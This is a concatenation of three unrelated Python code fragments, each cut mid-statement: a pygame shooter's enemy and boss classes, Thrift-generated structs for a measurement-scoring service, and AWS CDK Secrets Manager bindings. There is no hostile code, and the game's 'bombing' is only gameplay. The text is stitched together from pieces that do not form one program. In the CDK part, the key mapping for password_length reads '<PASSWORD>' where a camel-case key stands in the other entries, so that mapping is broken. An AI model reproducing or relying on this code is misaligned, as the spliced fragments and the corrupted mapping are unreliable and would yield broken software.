self.x = width + 100
self.y = randint(110, int((height * 5.9)/ 10))
if frame == self.FireOnFrame:
self.Fire(frame)
def Fire(self, frame):
EnemyBullets.append(Bullet(self.rect.left - 50, self.rect.centery -1, -10, 0, self.name))
self.FireOnFrame = frame + randint(60, 120)
def Die(self):
Player.score += 150
class EnemyWeirdPlane:
def __init__(self, y, frame):
self.sprite = pygame.image.load(os.path.join(os.getcwd(), "resources", "enemytest.png"))
self.sprite = pygame.transform.flip(self.sprite, True, False)
self.x = width + 100
self.y = y
self.horizspeed = 0
self.vertspeed = -3
self.rect = self.sprite.get_rect()
self.rect.topleft = ((self.x, self.y))
self.width = self.rect.width
self.height = self.rect.height
self.FireOnFrame = frame + randint(60, 120)
self.hitpoints = 1
self.name = "Enemy"
def Behave(self, frame):
if self.x >= width - 121:
if self.horizspeed >= -3 and frame % 10 == 0:
self.horizspeed -=1
elif self.horizspeed == -3:
pass
if self.x <= int(width/2) + 100:
if self.horizspeed <= 3 and frame % 10 == 0:
self.horizspeed += 1
if self.y <= 100 or self.y <= Player.y - 50:
if self.vertspeed <= 3 and frame % 10 == 0:
self.vertspeed += 1
if self.y >= bgLayerRect.top - 200 or self.y >= Player.y + 75:
if self.vertspeed >= -3 and frame % 10 == 0:
self.vertspeed -= 1
if frame == self.FireOnFrame:
self.Fire(frame)
def Fire(self, frame):
EnemyBalloons.append(WeatherBalloon(self.rect.left - 50, self.rect.centery -1, randint(-5, -1)))
self.FireOnFrame = frame + randint(30, 90)
def Die(self):
Player.score += 150
def CreateEnemies(ClassObject):
Enemies.append(ClassObject)
class ObjectiveTank:
def __init__(self):
self.sprite = tank
self.rect = self.sprite.get_rect()
self.rect.bottom = bgLayerRect.top
self.x = width + 100
self.y = self.rect.top
self.hitpoints = 5
self.speed = 0
self.width = self.rect.right - self.rect.left
self.height = self.rect.bottom - self.rect.top
Splosion = []
class Explosion:
def __init__(self, x, y, who, frame):
self.StartOnFrame = frame
self.x = x
self.y = y
self.who = who
self.width = 0
self.height = 0
self.sprite = pygame.image.load(os.path.join(os.getcwd(), "resources", "ExplosionFrame1.png"))
if who == "Bomb":
self.width = 30
self.height = 30
elif who == "Player":
self.width = 50
self.height = 50
self.sprite = pygame.transform.scale(self.sprite, (self.width, self.height))
def SpawnExplosion(x, y, who, frame):
Splosion.append(Explosion(x, y, who, frame))
class TOPSECRET:
def __init__(self, frame):
#self.sprite = vicviper
self.sprite = pygame.image.load(os.path.join(os.getcwd(), "resources", "secret", "vicviper.png"))
self.sprite = pygame.transform.flip(self.sprite, True, False)
self.name = "<NAME>"
self.hitpoints = 64
self.horizspeed = 0
self.vertspeed = 0
self.x = -1000
self.y = 150
self.rect = self.sprite.get_rect()
self.rect.topleft = ((self.x, self.y))
self.width = self.rect.width
self.height = self.rect.height
#Flags
self.status = "Spawning"
self.Cooldown = False
#Chrono
self.Timer = 0
self.BombOnFrame = 0
self.ShootOnFrame = 0
self.CooldownActivatedOnFrame = 0
self.Pattern = 0
self.ChargeASecondTime = False
def Behave(self, frame):
if self.status == "Spawning":
self.x += 10
if self.x >= width + 100:
self.status = "Idle"
self.horizspeed = -5
self.TimeAlive = 0
self.ShootOnFrame = frame + randint(20,30)
elif self.status == "Idle":
if self.x >= Player.rect.x + 25:
if self.horizspeed >= -5 and frame % 5 == 0:
self.horizspeed -= 1
elif self.horizspeed == -5:
pass
if self.x <= Player.x + 25:
if self.horizspeed <= 5 and frame % 5 == 0:
self.horizspeed += 1
if self.y <= int(height/2) or self.y <= Player.y + 25:
if self.vertspeed <= 6 and frame % 8 == 0:
self.vertspeed += 2
if self.y >= int(height/2) or self.y >= Player.y +25:
if self.vertspeed >= -6 and frame % 8 == 0:
self.vertspeed -= 2
if self.rect.bottom >= bgLayerRect.top:
self.rect.bottom = bgLayerRect.top
if self.status == "Idle" and Player.x >= self.x:
if frame == self.ShootOnFrame:
if self.hitpoints >= 50:
self.FireForwards(frame)
elif self.hitpoints < 50 and self.hitpoints >= 20:
self.FireDoubleForwards(frame)
elif self.hitpoints < 20:
self.FireTripleForwards(frame)
elif self.status == "Idle" and Player.x <= self.x:
if frame == self.ShootOnFrame:
if self.hitpoints >= 50:
self.FireBackwards(frame)
elif self.hitpoints < 50 and self.hitpoints >= 20:
self.FireDoubleBackwards(frame)
elif self.hitpoints < 20:
self.FireTripleBackwards(frame)
elif self.status == "Bombing":
self.y = 40
self.horizspeed = -5
if self.x <= width and self.x >= width - 6 and self.BombOnFrame == 0:
self.BombOnFrame = frame + 10
if self.x <= -100:
self.status = "Idle"
self.horizspeed = 5
self.y = Player.y + 25
Splosion.clear()
self.Timer = 0
self.BombOnFrame = 0
self.ShootOnFrame = frame + randint(20,35)
self.sprite = pygame.transform.flip(self.sprite, True, False)
elif self.status == "Charging":
if self.y == 0:
self.y = Player.y
else:
pass
self.vertspeed = 0
self.horizspeed = -20
if self.x <= -100:
self.status = "Idle"
self.horizspeed = 5
self.y = Player.y
Splosion.clear()
self.Timer = 0
self.BombOnFrame = 0
self.ShootOnFrame = frame + randint(20,35)
self.sprite = pygame.transform.flip(self.sprite, True, False)
elif self.status == "DoubleCharge":
if self.y == 0:
self.y = Player.y
else:
pass
self.vertspeed = 0
if self.ChargeASecondTime == False:
self.horizspeed = -20
else:
self.horizspeed = 20
if self.x < -150:
self.ChargeASecondTime = True
self.x = -100
self.y = Player.y
self.sprite = pygame.transform.flip(self.sprite, True, False)
if self.x >= width + 100 and self.ChargeASecondTime == True:
self.status = "Idle"
self.horizspeed = -5
self.y = Player.y
Splosion.clear()
self.Timer = 0
self.BombOnFrame = 0
self.ShootOnFrame = frame + randint(20,35)
self.ChargeASecondTime = False
self.Timer += 1
if self.Timer % 480 == 0 and self.status == "Idle":
self.status = "ExitScreen"
self.vertspeed = 0
if self.status == "ExitScreen" and self.x < width + 100:
self.horizspeed = 10
elif self.status == "ExitScreen" and self.x >= width + 100:
self.Pattern = randint(1, 3)
if self.Pattern == 1:
self.status = "Bombing"
self.x = width
self.sprite = pygame.transform.flip(self.sprite, True, False)
elif self.Pattern == 2:
self.status = "Charging"
self.y = 0
self.x = width
self.sprite = pygame.transform.flip(self.sprite, True, False)
elif self.Pattern == 3:
self.status = "DoubleCharge"
self.y = 0
self.x = width
self.sprite = pygame.transform.flip(self.sprite, True, False)
if self.status == "Bombing" and frame == self.BombOnFrame:
self.FireBombs(frame)
if frame >= self.CooldownActivatedOnFrame + 30:
self.Cooldown = False
def FireForwards(self, frame):
if Player.IsInvincible == False:
| |
problem
- arch
"""
def __init__(self, problem=None, arch=None,):
self.problem = problem
self.arch = arch
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.problem = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.arch = BinaryInputArchitecture()
self.arch.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('getMeasurements_args')
if self.problem is not None:
oprot.writeFieldBegin('problem', TType.STRING, 1)
oprot.writeString(self.problem.encode('utf-8') if sys.version_info[0] == 2 else self.problem)
oprot.writeFieldEnd()
if self.arch is not None:
oprot.writeFieldBegin('arch', TType.STRUCT, 2)
self.arch.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(getMeasurements_args)
getMeasurements_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'problem', 'UTF8', None, ), # 1
(2, TType.STRUCT, 'arch', [BinaryInputArchitecture, None], None, ), # 2
)
class getMeasurements_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype331, _size328) = iprot.readListBegin()
for _i332 in range(_size328):
_elem333 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.success.append(_elem333)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('getMeasurements_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRING, len(self.success))
for iter334 in self.success:
oprot.writeString(iter334.encode('utf-8') if sys.version_info[0] == 2 else iter334)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(getMeasurements_result)
getMeasurements_result.thrift_spec = (
(0, TType.LIST, 'success', (TType.STRING, 'UTF8', False), None, ), # 0
)
class getPanelScoresForArch_args(object):
"""
Attributes:
- problem
- arch
"""
def __init__(self, problem=None, arch=None,):
self.problem = problem
self.arch = arch
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.problem = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.arch = BinaryInputArchitecture()
self.arch.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('getPanelScoresForArch_args')
if self.problem is not None:
oprot.writeFieldBegin('problem', TType.STRING, 1)
oprot.writeString(self.problem.encode('utf-8') if sys.version_info[0] == 2 else self.problem)
oprot.writeFieldEnd()
if self.arch is not None:
oprot.writeFieldBegin('arch', TType.STRUCT, 2)
self.arch.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(getPanelScoresForArch_args)
getPanelScoresForArch_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'problem', 'UTF8', None, ), # 1
(2, TType.STRUCT, 'arch', [BinaryInputArchitecture, None], None, ), # 2
)
class getPanelScoresForArch_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype338, _size335) = iprot.readListBegin()
for _i339 in range(_size335):
_elem340 = iprot.readDouble()
self.success.append(_elem340)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('getPanelScoresForArch_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.DOUBLE, len(self.success))
for iter341 in self.success:
oprot.writeDouble(iter341)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(getPanelScoresForArch_result)
getPanelScoresForArch_result.thrift_spec = (
(0, TType.LIST, 'success', (TType.DOUBLE, None, False), None, ), # 0
)
class evaluateDataContinuityScore_args(object):
"""
Attributes:
- missionMeasurements
- historical_missionMeasurements
"""
def __init__(self, missionMeasurements=None, historical_missionMeasurements=None,):
self.missionMeasurements = missionMeasurements
self.historical_missionMeasurements = historical_missionMeasurements
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.missionMeasurements = []
(_etype345, _size342) = iprot.readListBegin()
for _i346 in range(_size342):
_elem347 = MissionMeasurements()
_elem347.read(iprot)
self.missionMeasurements.append(_elem347)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.historical_missionMeasurements = []
(_etype351, _size348) = iprot.readListBegin()
for _i352 in range(_size348):
_elem353 = MissionMeasurements()
_elem353.read(iprot)
self.historical_missionMeasurements.append(_elem353)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('evaluateDataContinuityScore_args')
if self.missionMeasurements is not None:
oprot.writeFieldBegin('missionMeasurements', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.missionMeasurements))
for iter354 in self.missionMeasurements:
iter354.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.historical_missionMeasurements is not None:
oprot.writeFieldBegin('historical_missionMeasurements', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.historical_missionMeasurements))
for iter355 in self.historical_missionMeasurements:
iter355.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(evaluateDataContinuityScore_args)
evaluateDataContinuityScore_args.thrift_spec = (
None, # 0
(1, TType.LIST, 'missionMeasurements', (TType.STRUCT, [MissionMeasurements, None], False), None, ), # 1
(2, TType.LIST, 'historical_missionMeasurements', (TType.STRUCT, [MissionMeasurements, None], False), None, ), # 2
)
class evaluateDataContinuityScore_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.DOUBLE:
self.success = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('evaluateDataContinuityScore_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.DOUBLE, 0)
oprot.writeDouble(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(evaluateDataContinuityScore_result)
evaluateDataContinuityScore_result.thrift_spec = (
(0, TType.DOUBLE, 'success', None, None, ), # 0
)
class evaluateFairnessScore_args(object):
"""
Attributes:
- missionMeasurements
"""
def __init__(self, missionMeasurements=None,):
self.missionMeasurements = missionMeasurements
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.missionMeasurements = []
(_etype359, _size356) = iprot.readListBegin()
for _i360 in range(_size356):
_elem361 = MissionMeasurements()
_elem361.read(iprot)
self.missionMeasurements.append(_elem361)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('evaluateFairnessScore_args')
if self.missionMeasurements is not None:
oprot.writeFieldBegin('missionMeasurements', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.missionMeasurements))
for iter362 in self.missionMeasurements:
iter362.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(evaluateFairnessScore_args)
evaluateFairnessScore_args.thrift_spec = (
None, # 0
(1, TType.LIST, 'missionMeasurements', (TType.STRUCT, [MissionMeasurements, None], False), None, ), # 1
)
class evaluateFairnessScore_result(object):
"""
Attributes:
- | |
typing.cast(typing.Optional[builtins.str], jsii.get(self, "name"))
@name.setter
def name(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "name", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="replicaRegions")
def replica_regions(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnSecret.ReplicaRegionProperty"]]]]:
'''``AWS::SecretsManager::Secret.ReplicaRegions``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-replicaregions
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnSecret.ReplicaRegionProperty"]]]], jsii.get(self, "replicaRegions"))
@replica_regions.setter
def replica_regions(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnSecret.ReplicaRegionProperty"]]]],
) -> None:
jsii.set(self, "replicaRegions", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="secretString")
def secret_string(self) -> typing.Optional[builtins.str]:
'''``AWS::SecretsManager::Secret.SecretString``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-secretstring
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "secretString"))
@secret_string.setter
def secret_string(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "secretString", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-secretsmanager.CfnSecret.GenerateSecretStringProperty",
jsii_struct_bases=[],
name_mapping={
"exclude_characters": "excludeCharacters",
"exclude_lowercase": "excludeLowercase",
"exclude_numbers": "excludeNumbers",
"exclude_punctuation": "excludePunctuation",
"exclude_uppercase": "excludeUppercase",
"generate_string_key": "generateStringKey",
"include_space": "includeSpace",
"password_length": "<PASSWORD>",
"require_each_included_type": "requireEachIncludedType",
"secret_string_template": "secretStringTemplate",
},
)
class GenerateSecretStringProperty:
def __init__(
self,
*,
exclude_characters: typing.Optional[builtins.str] = None,
exclude_lowercase: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
exclude_numbers: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
exclude_punctuation: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
exclude_uppercase: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
generate_string_key: typing.Optional[builtins.str] = None,
include_space: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
password_length: typing.Optional[jsii.Number] = None,
require_each_included_type: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
secret_string_template: typing.Optional[builtins.str] = None,
) -> None:
'''
:param exclude_characters: ``CfnSecret.GenerateSecretStringProperty.ExcludeCharacters``.
:param exclude_lowercase: ``CfnSecret.GenerateSecretStringProperty.ExcludeLowercase``.
:param exclude_numbers: ``CfnSecret.GenerateSecretStringProperty.ExcludeNumbers``.
:param exclude_punctuation: ``CfnSecret.GenerateSecretStringProperty.ExcludePunctuation``.
:param exclude_uppercase: ``CfnSecret.GenerateSecretStringProperty.ExcludeUppercase``.
:param generate_string_key: ``CfnSecret.GenerateSecretStringProperty.GenerateStringKey``.
:param include_space: ``CfnSecret.GenerateSecretStringProperty.IncludeSpace``.
:param password_length: ``CfnSecret.GenerateSecretStringProperty.PasswordLength``.
:param require_each_included_type: ``CfnSecret.GenerateSecretStringProperty.RequireEachIncludedType``.
:param secret_string_template: ``CfnSecret.GenerateSecretStringProperty.SecretStringTemplate``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html
'''
self._values: typing.Dict[str, typing.Any] = {}
if exclude_characters is not None:
self._values["exclude_characters"] = exclude_characters
if exclude_lowercase is not None:
self._values["exclude_lowercase"] = exclude_lowercase
if exclude_numbers is not None:
self._values["exclude_numbers"] = exclude_numbers
if exclude_punctuation is not None:
self._values["exclude_punctuation"] = exclude_punctuation
if exclude_uppercase is not None:
self._values["exclude_uppercase"] = exclude_uppercase
if generate_string_key is not None:
self._values["generate_string_key"] = generate_string_key
if include_space is not None:
self._values["include_space"] = include_space
if password_length is not None:
self._values["password_length"] = password_length
if require_each_included_type is not None:
self._values["require_each_included_type"] = require_each_included_type
if secret_string_template is not None:
self._values["secret_string_template"] = secret_string_template
@builtins.property
def exclude_characters(self) -> typing.Optional[builtins.str]:
'''``CfnSecret.GenerateSecretStringProperty.ExcludeCharacters``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-excludecharacters
'''
result = self._values.get("exclude_characters")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def exclude_lowercase(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnSecret.GenerateSecretStringProperty.ExcludeLowercase``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-excludelowercase
'''
result = self._values.get("exclude_lowercase")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def exclude_numbers(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnSecret.GenerateSecretStringProperty.ExcludeNumbers``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-excludenumbers
'''
result = self._values.get("exclude_numbers")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def exclude_punctuation(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnSecret.GenerateSecretStringProperty.ExcludePunctuation``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-excludepunctuation
'''
result = self._values.get("exclude_punctuation")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def exclude_uppercase(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnSecret.GenerateSecretStringProperty.ExcludeUppercase``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-excludeuppercase
'''
result = self._values.get("exclude_uppercase")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def generate_string_key(self) -> typing.Optional[builtins.str]:
'''``CfnSecret.GenerateSecretStringProperty.GenerateStringKey``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-generatestringkey
'''
result = self._values.get("generate_string_key")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def include_space(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnSecret.GenerateSecretStringProperty.IncludeSpace``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-includespace
'''
result = self._values.get("include_space")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def password_length(self) -> typing.Optional[jsii.Number]:
'''``CfnSecret.GenerateSecretStringProperty.PasswordLength``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-passwordlength
'''
result = self._values.get("password_length")
return typing.cast(typing.Optional[jsii.Number], result)
@builtins.property
def require_each_included_type(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnSecret.GenerateSecretStringProperty.RequireEachIncludedType``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-requireeachincludedtype
'''
result = self._values.get("require_each_included_type")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def secret_string_template(self) -> typing.Optional[builtins.str]:
'''``CfnSecret.GenerateSecretStringProperty.SecretStringTemplate``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-secretstringtemplate
'''
result = self._values.get("secret_string_template")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "GenerateSecretStringProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-secretsmanager.CfnSecret.ReplicaRegionProperty",
jsii_struct_bases=[],
name_mapping={"region": "region", "kms_key_id": "kmsKeyId"},
)
class ReplicaRegionProperty:
def __init__(
self,
*,
region: builtins.str,
kms_key_id: typing.Optional[builtins.str] = None,
) -> None:
'''
:param region: ``CfnSecret.ReplicaRegionProperty.Region``.
:param kms_key_id: ``CfnSecret.ReplicaRegionProperty.KmsKeyId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-replicaregion.html
'''
self._values: typing.Dict[str, typing.Any] = {
"region": region,
}
if kms_key_id is not None:
